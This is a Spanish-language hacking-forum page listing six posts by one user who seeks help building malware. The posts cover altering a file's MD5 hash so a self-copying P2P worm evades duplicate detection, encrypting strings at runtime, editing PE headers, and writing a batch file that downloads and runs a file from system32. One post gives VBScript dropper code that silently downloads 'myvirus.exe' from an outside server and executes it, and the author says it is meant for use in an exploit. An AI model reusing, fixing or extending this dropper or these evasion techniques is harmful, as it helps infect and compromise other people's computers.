elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: ¿Eres nuevo? ¿Tienes dudas acerca del funcionamiento de la comunidad? Lee las Reglas Generales


  Mostrar Temas
Páginas: [1]
1  Programación / Programación Visual Basic / Trabajar con el PE header en: 11 Noviembre 2009, 21:49 pm
Hola, estoy intentando leer y modificar la cabecera PE de un archivo desde visual basic, pero nose por donde empezar...Alguien me puede echar una mano?

Un saludo, akrana.
2  Programación / Programación Visual Basic / Modificar suma md5. en: 26 Octubre 2009, 19:53 pm
Hola, estoy programando un p2p spread y los clientes p2p comprueban la suma md5 de los archivos en su carpeta compartida para no agregarles 2 veces, aunque tengan diferente nombre, asique necesito modificar esa suma aleatoriamente cada vez que me copie, pero que el programa corra igual, alguna idea?

Un saludo, akrana.
3  Programación / Programación Visual Basic / Compresion en VB en: 4 Octubre 2009, 00:11 am
Buenas, quiero comprimir un archivo desde vb, para que pese menos, como puedo hacer esto?Cual es el algoritmo de compresion mas efectivo en cuanto al peso del archivo?

Un saludo, akrana.
4  Programación / Programación Visual Basic / Algoritmos encriptacion en el tiempo de ejecucion. en: 17 Septiembre 2009, 14:57 pm
Bueno, pues quisiera saber que algoritmos puedo utilizar, que corran en el tiempo de ejcucion del programa, para cifrar las strings. Necesito uno fuerte, he utilizado rotx, pero no me sirve...

Un saludo, akrana.
5  Programación / Scripting / Downloader en VBScript, ayuda. en: 17 Julio 2009, 02:48 am
Hola, estoy tratando de encontrar el codigo fuente de un downloader en VBScript para utilizarlo en un exploit, de momento tengo esto, pero me salta un error...
Código:
Sub Main()

On Error Resume Next
Set wsl = CreateObject("WScript.Shell")

bd = DowloadFile("http://www.myserver.com/myvirus.exe","c:\v.exe")

If bd = True Then wsl.run "c:\v.exe"
End Sub

Function DowloadFile(Url,Path)

On Error Resume Next: Err.Clear

Set xml = CreateObject("Microsoft.XMLHTTP")
Set ads = CreateObject("ADODB.Stream")

xml.Open "GET", Url, False
xml.Send

ads.Mode = 3

ads.Type = 1

ads.Open

ads.Write(xml.ResponseBody)

ads.SaveToFile(Path,2)

If Err Then DownloadFile = False Else DowloadFile = True
End Function

Necesito descargar y ejecutar un exe silenciosamente por medio de VBScript, pero este codigo no funciona...Si alguien lo puede revisar y decirme como lo puedo hacer se lo agradeceria.
No es totalmente indispensable que sea en VBScript, tambien puede ser en BATCH o por medio de una shellcode, pero no me aclaro...

Un saludo, gracias.
6  Programación / Scripting / Duda con archivo bat en: 5 Septiembre 2007, 04:53 am
Hola, estoy intentando programar un archivo bat que descargue un archivo de un servidor y posteriormente lo copie en la carpeta system32 de windows para luego ejcutarle automaticamente con unos flags determinados.

He leido el manual sobre programacion de archivos bat que esta en esta web pero todavia no se como hacerlo... asi que agradeceria una ayudita. Seguire buscando info hasta que de con ello.

Un saludo y gracias de antemano.
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines